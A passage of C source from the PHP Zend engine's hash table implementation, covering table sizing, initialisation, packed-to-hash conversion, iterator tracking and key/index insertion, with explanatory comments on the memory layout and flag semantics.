case HT_IS_DESTROYING:
zend_output_debug_string(1, "%s(%d) : ht=%p is being destroyed", file, line, ht);
break;
case HT_DESTROYED:
zend_output_debug_string(1, "%s(%d) : ht=%p is already destroyed", file, line, ht);
break;
case HT_CLEANING:
zend_output_debug_string(1, "%s(%d) : ht=%p is being cleaned", file, line, ht);
break;
default:
zend_output_debug_string(1, "%s(%d) : ht=%p is inconsistent", file, line, ht);
break;
}
zend_bailout();
}
#define IS_CONSISTENT(a) _zend_is_inconsistent(a, __FILE__, __LINE__);
#define SET_INCONSISTENT(n) do { \
(ht)->u.flags |= n; \
} while (0)
#else
#define IS_CONSISTENT(a)
#define SET_INCONSISTENT(n)
#endif
#define HASH_PROTECT_RECURSION(ht) \
if ((ht)->u.flags & HASH_FLAG_APPLY_PROTECTION) { \
if (((ht)->u.flags & ZEND_HASH_APPLY_COUNT_MASK) >= (3 << 8)) { \
zend_error_noreturn(E_ERROR, "Nesting level too deep - recursive dependency?");\
} \
ZEND_HASH_INC_APPLY_COUNT(ht); \
}
#define HASH_UNPROTECT_RECURSION(ht) \
if ((ht)->u.flags & HASH_FLAG_APPLY_PROTECTION) { \
ZEND_HASH_DEC_APPLY_COUNT(ht); \
}
#define ZEND_HASH_IF_FULL_DO_RESIZE(ht) \
if ((ht)->nNumUsed >= (ht)->nTableSize) { \
zend_hash_do_resize(ht); \
}
static void ZEND_FASTCALL zend_hash_do_resize(HashTable *ht);
static uint32_t zend_always_inline zend_hash_check_size(uint32_t nSize)
{
#if defined(ZEND_WIN32)
unsigned long index;
#endif
/* Use big enough power of 2 */
/* size should be between HT_MIN_SIZE and HT_MAX_SIZE */
if (nSize < HT_MIN_SIZE) {
nSize = HT_MIN_SIZE;
} else if (UNEXPECTED(nSize >= HT_MAX_SIZE)) {
zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", nSize, sizeof(Bucket), sizeof(Bucket));
}
#if defined(ZEND_WIN32)
if (BitScanReverse(&index, nSize - 1)) {
return 0x2 << ((31 - index) ^ 0x1f);
} else {
/* nSize is ensured to be in the valid range, fall back to it
rather than using an undefined bit scan result. */
return nSize;
}
#elif (defined(__GNUC__) || __has_builtin(__builtin_clz)) && defined(PHP_HAVE_BUILTIN_CLZ)
return 0x2 << (__builtin_clz(nSize - 1) ^ 0x1f);
#else
nSize -= 1;
nSize |= (nSize >> 1);
nSize |= (nSize >> 2);
nSize |= (nSize >> 4);
nSize |= (nSize >> 8);
nSize |= (nSize >> 16);
return nSize + 1;
#endif
}
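/*
* zend_hash_check_size() rounds the requested size up to the next power of
* two within [HT_MIN_SIZE, HT_MAX_SIZE). A rough worked example for the
* __builtin_clz() branch (assuming 32-bit unsigned arithmetic):
*
*   nSize = 1000 -> clz(999) = 22 -> 22 ^ 0x1f = 9 -> 0x2 << 9 = 1024
*   nSize = 9    -> clz(8)   = 28 -> 28 ^ 0x1f = 3 -> 0x2 << 3 = 16
*   nSize = 8    -> clz(7)   = 29 -> 29 ^ 0x1f = 2 -> 0x2 << 2 = 8
*
* The portable fallback reaches the same result by smearing the highest set
* bit downwards (nSize |= nSize >> 1, ...) and adding one.
*/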
static void zend_always_inline zend_hash_real_init_ex(HashTable *ht, int packed)
{
HT_ASSERT(GC_REFCOUNT(ht) == 1);
ZEND_ASSERT(!((ht)->u.flags & HASH_FLAG_INITIALIZED));
if (packed) {
HT_SET_DATA_ADDR(ht, pemalloc(HT_SIZE(ht), (ht)->u.flags & HASH_FLAG_PERSISTENT));
(ht)->u.flags |= HASH_FLAG_INITIALIZED | HASH_FLAG_PACKED;
HT_HASH_RESET_PACKED(ht);
} else {
(ht)->nTableMask = -(ht)->nTableSize;
HT_SET_DATA_ADDR(ht, pemalloc(HT_SIZE(ht), (ht)->u.flags & HASH_FLAG_PERSISTENT));
(ht)->u.flags |= HASH_FLAG_INITIALIZED;
if (EXPECTED(ht->nTableMask == -8)) {
Bucket *arData = ht->arData;
HT_HASH_EX(arData, -8) = -1;
HT_HASH_EX(arData, -7) = -1;
HT_HASH_EX(arData, -6) = -1;
HT_HASH_EX(arData, -5) = -1;
HT_HASH_EX(arData, -4) = -1;
HT_HASH_EX(arData, -3) = -1;
HT_HASH_EX(arData, -2) = -1;
HT_HASH_EX(arData, -1) = -1;
} else {
HT_HASH_RESET(ht);
}
}
}
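/*
* Memory layout note: HT_SET_DATA_ADDR() places the allocation so that the
* uint32_t hash slot array lives immediately *before* arData, and
* nTableMask is the negative table size. A lookup therefore computes
* nIndex = h | nTableMask, a value in [-nTableSize, -1], and uses it as a
* negative offset from arData via HT_HASH_EX(arData, nIndex), while the
* buckets themselves grow upwards from arData. The nTableMask == -8 special
* case above simply unrolls the reset of the minimal 8-slot hash part.
*/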
static void zend_always_inline zend_hash_check_init(HashTable *ht, int packed)
{
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (UNEXPECTED(!((ht)->u.flags & HASH_FLAG_INITIALIZED))) {
zend_hash_real_init_ex(ht, packed);
}
}
#define CHECK_INIT(ht, packed) \
zend_hash_check_init(ht, packed)
static const uint32_t uninitialized_bucket[-HT_MIN_MASK] =
{HT_INVALID_IDX, HT_INVALID_IDX};
ZEND_API void ZEND_FASTCALL _zend_hash_init(HashTable *ht, uint32_t nSize, dtor_func_t pDestructor, zend_bool persistent ZEND_FILE_LINE_DC)
{
GC_REFCOUNT(ht) = 1;
GC_TYPE_INFO(ht) = IS_ARRAY;
ht->u.flags = (persistent ? HASH_FLAG_PERSISTENT : 0) | HASH_FLAG_APPLY_PROTECTION | HASH_FLAG_STATIC_KEYS;
ht->nTableSize = zend_hash_check_size(nSize);
ht->nTableMask = HT_MIN_MASK;
HT_SET_DATA_ADDR(ht, &uninitialized_bucket);
ht->nNumUsed = 0;
ht->nNumOfElements = 0;
ht->nInternalPointer = HT_INVALID_IDX;
ht->nNextFreeElement = 0;
ht->pDestructor = pDestructor;
}
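/*
* A minimal usage sketch of the public API built on top of
* _zend_hash_init() (illustrative only; the variable names are made up and
* error handling is omitted):
*
*   HashTable ht;
*   zval tmp, *found;
*
*   zend_hash_init(&ht, 8, NULL, ZVAL_PTR_DTOR, 0);
*   ZVAL_LONG(&tmp, 42);
*   zend_hash_str_update(&ht, "answer", sizeof("answer") - 1, &tmp);
*   found = zend_hash_str_find(&ht, "answer", sizeof("answer") - 1);
*   zend_hash_destroy(&ht);
*
* Note that no bucket storage is allocated here; allocation is deferred to
* the first insertion via CHECK_INIT()/zend_hash_real_init_ex().
*/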
static void ZEND_FASTCALL zend_hash_packed_grow(HashTable *ht)
{
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (ht->nTableSize >= HT_MAX_SIZE) {
zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", ht->nTableSize * 2, sizeof(Bucket), sizeof(Bucket));
}
HANDLE_BLOCK_INTERRUPTIONS();
ht->nTableSize += ht->nTableSize;
HT_SET_DATA_ADDR(ht, perealloc2(HT_GET_DATA_ADDR(ht), HT_SIZE(ht), HT_USED_SIZE(ht), ht->u.flags & HASH_FLAG_PERSISTENT));
HANDLE_UNBLOCK_INTERRUPTIONS();
}
ZEND_API void ZEND_FASTCALL zend_hash_real_init(HashTable *ht, zend_bool packed)
{
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
zend_hash_real_init_ex(ht, packed);
}
ZEND_API void ZEND_FASTCALL zend_hash_packed_to_hash(HashTable *ht)
{
void *new_data, *old_data = HT_GET_DATA_ADDR(ht);
Bucket *old_buckets = ht->arData;
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HANDLE_BLOCK_INTERRUPTIONS();
ht->u.flags &= ~HASH_FLAG_PACKED;
new_data = pemalloc(HT_SIZE_EX(ht->nTableSize, -ht->nTableSize), (ht)->u.flags & HASH_FLAG_PERSISTENT);
ht->nTableMask = -ht->nTableSize;
HT_SET_DATA_ADDR(ht, new_data);
memcpy(ht->arData, old_buckets, sizeof(Bucket) * ht->nNumUsed);
pefree(old_data, (ht)->u.flags & HASH_FLAG_PERSISTENT);
zend_hash_rehash(ht);
HANDLE_UNBLOCK_INTERRUPTIONS();
}
ZEND_API void ZEND_FASTCALL zend_hash_to_packed(HashTable *ht)
{
void *new_data, *old_data = HT_GET_DATA_ADDR(ht);
Bucket *old_buckets = ht->arData;
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HANDLE_BLOCK_INTERRUPTIONS();
new_data = pemalloc(HT_SIZE_EX(ht->nTableSize, HT_MIN_MASK), (ht)->u.flags & HASH_FLAG_PERSISTENT);
ht->u.flags |= HASH_FLAG_PACKED | HASH_FLAG_STATIC_KEYS;
ht->nTableMask = HT_MIN_MASK;
HT_SET_DATA_ADDR(ht, new_data);
HT_HASH_RESET_PACKED(ht);
memcpy(ht->arData, old_buckets, sizeof(Bucket) * ht->nNumUsed);
pefree(old_data, (ht)->u.flags & HASH_FLAG_PERSISTENT);
HANDLE_UNBLOCK_INTERRUPTIONS();
}
ZEND_API void ZEND_FASTCALL _zend_hash_init_ex(HashTable *ht, uint32_t nSize, dtor_func_t pDestructor, zend_bool persistent, zend_bool bApplyProtection ZEND_FILE_LINE_DC)
{
_zend_hash_init(ht, nSize, pDestructor, persistent ZEND_FILE_LINE_RELAY_CC);
if (!bApplyProtection) {
ht->u.flags &= ~HASH_FLAG_APPLY_PROTECTION;
}
}
ZEND_API void ZEND_FASTCALL zend_hash_extend(HashTable *ht, uint32_t nSize, zend_bool packed)
{
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (nSize == 0) return;
if (UNEXPECTED(!((ht)->u.flags & HASH_FLAG_INITIALIZED))) {
if (nSize > ht->nTableSize) {
ht->nTableSize = zend_hash_check_size(nSize);
}
zend_hash_check_init(ht, packed);
} else {
if (packed) {
ZEND_ASSERT(ht->u.flags & HASH_FLAG_PACKED);
if (nSize > ht->nTableSize) {
HANDLE_BLOCK_INTERRUPTIONS();
ht->nTableSize = zend_hash_check_size(nSize);
HT_SET_DATA_ADDR(ht, perealloc2(HT_GET_DATA_ADDR(ht), HT_SIZE(ht), HT_USED_SIZE(ht), ht->u.flags & HASH_FLAG_PERSISTENT));
HANDLE_UNBLOCK_INTERRUPTIONS();
}
} else {
ZEND_ASSERT(!(ht->u.flags & HASH_FLAG_PACKED));
if (nSize > ht->nTableSize) {
void *new_data, *old_data = HT_GET_DATA_ADDR(ht);
Bucket *old_buckets = ht->arData;
nSize = zend_hash_check_size(nSize);
HANDLE_BLOCK_INTERRUPTIONS();
new_data = pemalloc(HT_SIZE_EX(nSize, -nSize), ht->u.flags & HASH_FLAG_PERSISTENT);
ht->nTableSize = nSize;
ht->nTableMask = -ht->nTableSize;
HT_SET_DATA_ADDR(ht, new_data);
memcpy(ht->arData, old_buckets, sizeof(Bucket) * ht->nNumUsed);
pefree(old_data, ht->u.flags & HASH_FLAG_PERSISTENT);
zend_hash_rehash(ht);
HANDLE_UNBLOCK_INTERRUPTIONS();
}
}
}
}
static uint32_t zend_array_recalc_elements(HashTable *ht)
{
zval *val;
uint32_t num = ht->nNumOfElements;
ZEND_HASH_FOREACH_VAL(ht, val) {
if (Z_TYPE_P(val) == IS_UNDEF) continue;
if (Z_TYPE_P(val) == IS_INDIRECT) {
if (UNEXPECTED(Z_TYPE_P(Z_INDIRECT_P(val)) == IS_UNDEF)) {
num--;
}
}
} ZEND_HASH_FOREACH_END();
return num;
}
/* }}} */
ZEND_API uint32_t zend_array_count(HashTable *ht)
{
uint32_t num;
if (UNEXPECTED(ht->u.v.flags & HASH_FLAG_HAS_EMPTY_IND)) {
num = zend_array_recalc_elements(ht);
if (UNEXPECTED(ht->nNumOfElements == num)) {
ht->u.v.flags &= ~HASH_FLAG_HAS_EMPTY_IND;
}
} else if (UNEXPECTED(ht == &EG(symbol_table))) {
num = zend_array_recalc_elements(ht);
} else {
num = zend_hash_num_elements(ht);
}
return num;
}
/* }}} */
ZEND_API void ZEND_FASTCALL zend_hash_set_apply_protection(HashTable *ht, zend_bool bApplyProtection)
{
if (bApplyProtection) {
ht->u.flags |= HASH_FLAG_APPLY_PROTECTION;
} else {
ht->u.flags &= ~HASH_FLAG_APPLY_PROTECTION;
}
}
ZEND_API uint32_t ZEND_FASTCALL zend_hash_iterator_add(HashTable *ht, HashPosition pos)
{
HashTableIterator *iter = EG(ht_iterators);
HashTableIterator *end = iter + EG(ht_iterators_count);
uint32_t idx;
if (EXPECTED(ht->u.v.nIteratorsCount != 255)) {
ht->u.v.nIteratorsCount++;
}
while (iter != end) {
if (iter->ht == NULL) {
iter->ht = ht;
iter->pos = pos;
idx = iter - EG(ht_iterators);
if (idx + 1 > EG(ht_iterators_used)) {
EG(ht_iterators_used) = idx + 1;
}
return idx;
}
iter++;
}
if (EG(ht_iterators) == EG(ht_iterators_slots)) {
EG(ht_iterators) = emalloc(sizeof(HashTableIterator) * (EG(ht_iterators_count) + 8));
memcpy(EG(ht_iterators), EG(ht_iterators_slots), sizeof(HashTableIterator) * EG(ht_iterators_count));
} else {
EG(ht_iterators) = erealloc(EG(ht_iterators), sizeof(HashTableIterator) * (EG(ht_iterators_count) + 8));
}
iter = EG(ht_iterators) + EG(ht_iterators_count);
EG(ht_iterators_count) += 8;
iter->ht = ht;
iter->pos = pos;
memset(iter + 1, 0, sizeof(HashTableIterator) * 7);
idx = iter - EG(ht_iterators);
EG(ht_iterators_used) = idx + 1;
return idx;
}
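/*
* The iterator functions above and below manage the registry of "external"
* iterators (e.g. a foreach loop over an array that may be modified while
* it is being traversed). Slots are taken from EG(ht_iterators); once the
* small static EG(ht_iterators_slots) buffer is exhausted, the array is
* grown on the heap in chunks of 8. ht->u.v.nIteratorsCount saturates at
* 255, after which the per-table count is no longer tracked precisely.
*/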
ZEND_API HashPosition ZEND_FASTCALL zend_hash_iterator_pos(uint32_t idx, HashTable *ht)
{
HashTableIterator *iter = EG(ht_iterators) + idx;
ZEND_ASSERT(idx != (uint32_t)-1);
if (iter->pos == HT_INVALID_IDX) {
return HT_INVALID_IDX;
} else if (UNEXPECTED(iter->ht != ht)) {
if (EXPECTED(iter->ht) && EXPECTED(iter->ht != HT_POISONED_PTR)
&& EXPECTED(iter->ht->u.v.nIteratorsCount != 255)) {
iter->ht->u.v.nIteratorsCount--;
}
if (EXPECTED(ht->u.v.nIteratorsCount != 255)) {
ht->u.v.nIteratorsCount++;
}
iter->ht = ht;
iter->pos = ht->nInternalPointer;
}
return iter->pos;
}
ZEND_API HashPosition ZEND_FASTCALL zend_hash_iterator_pos_ex(uint32_t idx, zval *array)
{
HashTable *ht = Z_ARRVAL_P(array);
HashTableIterator *iter = EG(ht_iterators) + idx;
ZEND_ASSERT(idx != (uint32_t)-1);
if (iter->pos == HT_INVALID_IDX) {
return HT_INVALID_IDX;
} else if (UNEXPECTED(iter->ht != ht)) {
if (EXPECTED(iter->ht) && EXPECTED(iter->ht != HT_POISONED_PTR)
&& EXPECTED(iter->ht->u.v.nIteratorsCount != 255)) {
iter->ht->u.v.nIteratorsCount--;
}
SEPARATE_ARRAY(array);
ht = Z_ARRVAL_P(array);
if (EXPECTED(ht->u.v.nIteratorsCount != 255)) {
ht->u.v.nIteratorsCount++;
}
iter->ht = ht;
iter->pos = ht->nInternalPointer;
}
return iter->pos;
}
ZEND_API void ZEND_FASTCALL zend_hash_iterator_del(uint32_t idx)
{
HashTableIterator *iter = EG(ht_iterators) + idx;
ZEND_ASSERT(idx != (uint32_t)-1);
if (EXPECTED(iter->ht) && EXPECTED(iter->ht != HT_POISONED_PTR)
&& EXPECTED(iter->ht->u.v.nIteratorsCount != 255)) {
iter->ht->u.v.nIteratorsCount--;
}
iter->ht = NULL;
if (idx == EG(ht_iterators_used) - 1) {
while (idx > 0 && EG(ht_iterators)[idx - 1].ht == NULL) {
idx--;
}
EG(ht_iterators_used) = idx;
}
}
static zend_never_inline void ZEND_FASTCALL _zend_hash_iterators_remove(HashTable *ht)
{
HashTableIterator *iter = EG(ht_iterators);
HashTableIterator *end = iter + EG(ht_iterators_used);
while (iter != end) {
if (iter->ht == ht) {
iter->ht = HT_POISONED_PTR;
}
iter++;
}
}
static zend_always_inline void zend_hash_iterators_remove(HashTable *ht)
{
if (UNEXPECTED(ht->u.v.nIteratorsCount)) {
_zend_hash_iterators_remove(ht);
}
}
ZEND_API HashPosition ZEND_FASTCALL zend_hash_iterators_lower_pos(HashTable *ht, HashPosition start)
{
HashTableIterator *iter = EG(ht_iterators);
HashTableIterator *end = iter + EG(ht_iterators_used);
HashPosition res = HT_INVALID_IDX;
while (iter != end) {
if (iter->ht == ht) {
if (iter->pos >= start && iter->pos < res) {
res = iter->pos;
}
}
iter++;
}
return res;
}
ZEND_API void ZEND_FASTCALL _zend_hash_iterators_update(HashTable *ht, HashPosition from, HashPosition to)
{
HashTableIterator *iter = EG(ht_iterators);
HashTableIterator *end = iter + EG(ht_iterators_used);
while (iter != end) {
if (iter->ht == ht && iter->pos == from) {
iter->pos = to;
}
iter++;
}
}
static zend_always_inline Bucket *zend_hash_find_bucket(const HashTable *ht, zend_string *key)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p, *arData;
h = zend_string_hash_val(key);
arData = ht->arData;
nIndex = h | ht->nTableMask;
idx = HT_HASH_EX(arData, nIndex);
while (EXPECTED(idx != HT_INVALID_IDX)) {
p = HT_HASH_TO_BUCKET_EX(arData, idx);
if (EXPECTED(p->key == key)) { /* check for the same interned string */
return p;
} else if (EXPECTED(p->h == h) &&
EXPECTED(p->key) &&
EXPECTED(ZSTR_LEN(p->key) == ZSTR_LEN(key)) &&
EXPECTED(memcmp(ZSTR_VAL(p->key), ZSTR_VAL(key), ZSTR_LEN(key)) == 0)) {
return p;
}
idx = Z_NEXT(p->val);
}
return NULL;
}
static zend_always_inline Bucket *zend_hash_str_find_bucket(const HashTable *ht, const char *str, size_t len, zend_ulong h)
{
uint32_t nIndex;
uint32_t idx;
Bucket *p, *arData;
arData = ht->arData;
nIndex = h | ht->nTableMask;
idx = HT_HASH_EX(arData, nIndex);
while (idx != HT_INVALID_IDX) {
ZEND_ASSERT(idx < HT_IDX_TO_HASH(ht->nTableSize));
p = HT_HASH_TO_BUCKET_EX(arData, idx);
if ((p->h == h)
&& p->key
&& (ZSTR_LEN(p->key) == len)
&& !memcmp(ZSTR_VAL(p->key), str, len)) {
return p;
}
idx = Z_NEXT(p->val);
}
return NULL;
}
static zend_always_inline Bucket *zend_hash_index_find_bucket(const HashTable *ht, zend_ulong h)
{
uint32_t nIndex;
uint32_t idx;
Bucket *p, *arData;
arData = ht->arData;
nIndex = h | ht->nTableMask;
idx = HT_HASH_EX(arData, nIndex);
while (idx != HT_INVALID_IDX) {
ZEND_ASSERT(idx < HT_IDX_TO_HASH(ht->nTableSize));
p = HT_HASH_TO_BUCKET_EX(arData, idx);
if (p->h == h && !p->key) {
return p;
}
idx = Z_NEXT(p->val);
}
return NULL;
}
static zend_always_inline zval *_zend_hash_add_or_update_i(HashTable *ht, zend_string *key, zval *pData, uint32_t flag ZEND_FILE_LINE_DC)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (UNEXPECTED(!(ht->u.flags & HASH_FLAG_INITIALIZED))) {
CHECK_INIT(ht, 0);
goto add_to_hash;
} else if (ht->u.flags & HASH_FLAG_PACKED) {
zend_hash_packed_to_hash(ht);
} else if ((flag & HASH_ADD_NEW) == 0) {
p = zend_hash_find_bucket(ht, key);
if (p) {
zval *data;
if (flag & HASH_ADD) {
if (!(flag & HASH_UPDATE_INDIRECT)) {
return NULL;
}
ZEND_ASSERT(&p->val != pData);
data = &p->val;
if (Z_TYPE_P(data) == IS_INDIRECT) {
data = Z_INDIRECT_P(data);
if (Z_TYPE_P(data) != IS_UNDEF) {
return NULL;
}
} else {
return NULL;
}
} else {
ZEND_ASSERT(&p->val != pData);
data = &p->val;
if ((flag & HASH_UPDATE_INDIRECT) && Z_TYPE_P(data) == IS_INDIRECT) {
data = Z_INDIRECT_P(data);
}
}
HANDLE_BLOCK_INTERRUPTIONS();
if (ht->pDestructor) {
ht->pDestructor(data);
}
ZVAL_COPY_VALUE(data, pData);
HANDLE_UNBLOCK_INTERRUPTIONS();
return data;
}
}
ZEND_HASH_IF_FULL_DO_RESIZE(ht); /* If the Hash table is full, resize it */
add_to_hash:
HANDLE_BLOCK_INTERRUPTIONS();
idx = ht->nNumUsed++;
ht->nNumOfElements++;
if (ht->nInternalPointer == HT_INVALID_IDX) {
ht->nInternalPointer = idx;
}
zend_hash_iterators_update(ht, HT_INVALID_IDX, idx);
p = ht->arData + idx;
p->key = key;
if (!ZSTR_IS_INTERNED(key)) {
zend_string_addref(key);
ht->u.flags &= ~HASH_FLAG_STATIC_KEYS;
zend_string_hash_val(key);
}
p->h = h = ZSTR_H(key);
ZVAL_COPY_VALUE(&p->val, pData);
nIndex = h | ht->nTableMask;
Z_NEXT(p->val) = HT_HASH(ht, nIndex);
HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(idx);
HANDLE_UNBLOCK_INTERRUPTIONS();
return &p->val;
}
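/*
* Flag semantics for _zend_hash_add_or_update_i() and the wrappers that
* follow: HASH_ADD fails with NULL if the key already exists, HASH_UPDATE
* overwrites the existing value, HASH_UPDATE_INDIRECT additionally follows
* IS_INDIRECT slots (used for symbol tables) before deciding, and
* HASH_ADD_NEW is a promise by the caller that the key is not present yet,
* so the bucket lookup is skipped entirely.
*/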
ZEND_API zval* ZEND_FASTCALL _zend_hash_add_or_update(HashTable *ht, zend_string *key, zval *pData, uint32_t flag ZEND_FILE_LINE_DC)
{
return _zend_hash_add_or_update_i(ht, key, pData, flag ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_add(HashTable *ht, zend_string *key, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_add_or_update_i(ht, key, pData, HASH_ADD ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_update(HashTable *ht, zend_string *key, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_add_or_update_i(ht, key, pData, HASH_UPDATE ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_update_ind(HashTable *ht, zend_string *key, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_add_or_update_i(ht, key, pData, HASH_UPDATE | HASH_UPDATE_INDIRECT ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_add_new(HashTable *ht, zend_string *key, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_add_or_update_i(ht, key, pData, HASH_ADD_NEW ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_str_add_or_update(HashTable *ht, const char *str, size_t len, zval *pData, uint32_t flag ZEND_FILE_LINE_DC)
{
zend_string *key = zend_string_init(str, len, ht->u.flags & HASH_FLAG_PERSISTENT);
zval *ret = _zend_hash_add_or_update_i(ht, key, pData, flag ZEND_FILE_LINE_RELAY_CC);
zend_string_release(key);
return ret;
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_str_update(HashTable *ht, const char *str, size_t len, zval *pData ZEND_FILE_LINE_DC)
{
zend_string *key = zend_string_init(str, len, ht->u.flags & HASH_FLAG_PERSISTENT);
zval *ret = _zend_hash_add_or_update_i(ht, key, pData, HASH_UPDATE ZEND_FILE_LINE_RELAY_CC);
zend_string_release(key);
return ret;
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_str_update_ind(HashTable *ht, const char *str, size_t len, zval *pData ZEND_FILE_LINE_DC)
{
zend_string *key = zend_string_init(str, len, ht->u.flags & HASH_FLAG_PERSISTENT);
zval *ret = _zend_hash_add_or_update_i(ht, key, pData, HASH_UPDATE | HASH_UPDATE_INDIRECT ZEND_FILE_LINE_RELAY_CC);
zend_string_release(key);
return ret;
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_str_add(HashTable *ht, const char *str, size_t len, zval *pData ZEND_FILE_LINE_DC)
{
zend_string *key = zend_string_init(str, len, ht->u.flags & HASH_FLAG_PERSISTENT);
zval *ret = _zend_hash_add_or_update_i(ht, key, pData, HASH_ADD ZEND_FILE_LINE_RELAY_CC);
zend_string_release(key);
return ret;
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_str_add_new(HashTable *ht, const char *str, size_t len, zval *pData ZEND_FILE_LINE_DC)
{
zend_string *key = zend_string_init(str, len, ht->u.flags & HASH_FLAG_PERSISTENT);
zval *ret = _zend_hash_add_or_update_i(ht, key, pData, HASH_ADD_NEW ZEND_FILE_LINE_RELAY_CC);
zend_string_delref(key);
return ret;
}
ZEND_API zval* ZEND_FASTCALL zend_hash_index_add_empty_element(HashTable *ht, zend_ulong h)
{
zval dummy;
ZVAL_NULL(&dummy);
return zend_hash_index_add(ht, h, &dummy);
}
ZEND_API zval* ZEND_FASTCALL zend_hash_add_empty_element(HashTable *ht, zend_string *key)
{
zval dummy;
ZVAL_NULL(&dummy);
return zend_hash_add(ht, key, &dummy);
}
ZEND_API zval* ZEND_FASTCALL zend_hash_str_add_empty_element(HashTable *ht, const char *str, size_t len)
{
zval dummy;
ZVAL_NULL(&dummy);
return zend_hash_str_add(ht, str, len, &dummy);
}
static zend_always_inline zval *_zend_hash_index_add_or_update_i(HashTable *ht, zend_ulong h, zval *pData, uint32_t flag ZEND_FILE_LINE_DC)
{
uint32_t nIndex;
uint32_t idx;
Bucket *p;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (UNEXPECTED(!(ht->u.flags & HASH_FLAG_INITIALIZED))) {
CHECK_INIT(ht, h < ht->nTableSize);
if (h < ht->nTableSize) {
p = ht->arData + h;
goto add_to_packed;
}
goto add_to_hash;
} else if (ht->u.flags & HASH_FLAG_PACKED) {
if (h < ht->nNumUsed) {
p = ht->arData + h;
if (Z_TYPE(p->val) != IS_UNDEF) {
if (flag & HASH_ADD) {
return NULL;
}
if (ht->pDestructor) {
ht->pDestructor(&p->val);
}
ZVAL_COPY_VALUE(&p->val, pData);
if ((zend_long)h >= (zend_long)ht->nNextFreeElement) {
ht->nNextFreeElement = h < ZEND_LONG_MAX ? h + 1 : ZEND_LONG_MAX;
}
return &p->val;
} else { /* we have to keep the order :( */
goto convert_to_hash;
}
} else if (EXPECTED(h < ht->nTableSize)) {
p = ht->arData + h;
} else if ((h >> 1) < ht->nTableSize &&
(ht->nTableSize >> 1) < ht->nNumOfElements) {
zend_hash_packed_grow(ht);
p = ht->arData + h;
} else {
goto convert_to_hash;
}
add_to_packed:
HANDLE_BLOCK_INTERRUPTIONS();
/* incremental initialization of empty Buckets */
if ((flag & (HASH_ADD_NEW|HASH_ADD_NEXT)) == (HASH_ADD_NEW|HASH_ADD_NEXT)) {
ht->nNumUsed = h + 1;
} else if (h >= ht->nNumUsed) {
if (h > ht->nNumUsed) {
Bucket *q = ht->arData + ht->nNumUsed;
while (q != p) {
ZVAL_UNDEF(&q->val);
q++;
}
}
ht->nNumUsed = h + 1;
}
ht->nNumOfElements++;
if (ht->nInternalPointer == HT_INVALID_IDX) {
ht->nInternalPointer = h;
}
zend_hash_iterators_update(ht, HT_INVALID_IDX, h);
if ((zend_long)h >= (zend_long)ht->nNextFreeElement) {
ht->nNextFreeElement = h < ZEND_LONG_MAX ? h + 1 : ZEND_LONG_MAX;
}
p->h = h;
p->key = NULL;
ZVAL_COPY_VALUE(&p->val, pData);
HANDLE_UNBLOCK_INTERRUPTIONS();
return &p->val;
convert_to_hash:
zend_hash_packed_to_hash(ht);
} else if ((flag & HASH_ADD_NEW) == 0) {
p = zend_hash_index_find_bucket(ht, h);
if (p) {
if (flag & HASH_ADD) {
return NULL;
}
ZEND_ASSERT(&p->val != pData);
HANDLE_BLOCK_INTERRUPTIONS();
if (ht->pDestructor) {
ht->pDestructor(&p->val);
}
ZVAL_COPY_VALUE(&p->val, pData);
HANDLE_UNBLOCK_INTERRUPTIONS();
if ((zend_long)h >= (zend_long)ht->nNextFreeElement) {
ht->nNextFreeElement = h < ZEND_LONG_MAX ? h + 1 : ZEND_LONG_MAX;
}
return &p->val;
}
}
ZEND_HASH_IF_FULL_DO_RESIZE(ht); /* If the Hash table is full, resize it */
add_to_hash:
HANDLE_BLOCK_INTERRUPTIONS();
idx = ht->nNumUsed++;
ht->nNumOfElements++;
if (ht->nInternalPointer == HT_INVALID_IDX) {
ht->nInternalPointer = idx;
}
zend_hash_iterators_update(ht, HT_INVALID_IDX, idx);
if ((zend_long)h >= (zend_long)ht->nNextFreeElement) {
ht->nNextFreeElement = h < ZEND_LONG_MAX ? h + 1 : ZEND_LONG_MAX;
}
p = ht->arData + idx;
p->h = h;
p->key = NULL;
nIndex = h | ht->nTableMask;
ZVAL_COPY_VALUE(&p->val, pData);
Z_NEXT(p->val) = HT_HASH(ht, nIndex);
HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(idx);
HANDLE_UNBLOCK_INTERRUPTIONS();
return &p->val;
}
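/*
* Packed-array fast path: while HASH_FLAG_PACKED is set the integer key is
* used directly as the arData index, so no collision chains are maintained.
* The code above keeps the table packed as long as the new index lands
* inside the current allocation, or only slightly beyond a reasonably full
* table (the h >> 1 / nTableSize >> 1 test), in which case the packed
* storage is simply grown. Anything sparser, or a write into an existing
* UNDEF hole below nNumUsed, falls through to convert_to_hash and the table
* becomes a regular hash so that element order is preserved.
*/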
ZEND_API zval* ZEND_FASTCALL _zend_hash_index_add_or_update(HashTable *ht, zend_ulong h, zval *pData, uint32_t flag ZEND_FILE_LINE_DC)
